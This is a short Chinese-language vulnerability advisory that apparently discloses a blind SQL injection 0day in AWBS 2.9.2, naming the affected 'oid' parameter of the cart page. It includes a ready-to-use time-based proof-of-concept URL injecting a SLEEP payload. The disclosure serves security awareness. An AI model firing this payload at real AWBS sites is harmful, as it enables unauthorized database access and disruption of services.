AWBS 2.9.2 Blind SQL 注入0day


    影响版本:AWBS 2.9.2
    官方网站:http://www.awbs.com
    漏洞类型:SQL注入
    漏洞描述:
    ---Vulnerability---
    http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]
    =============================================================================================
    ---PoC Using Time-Based Blind SQL Injection---
    https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='
     
相关文章!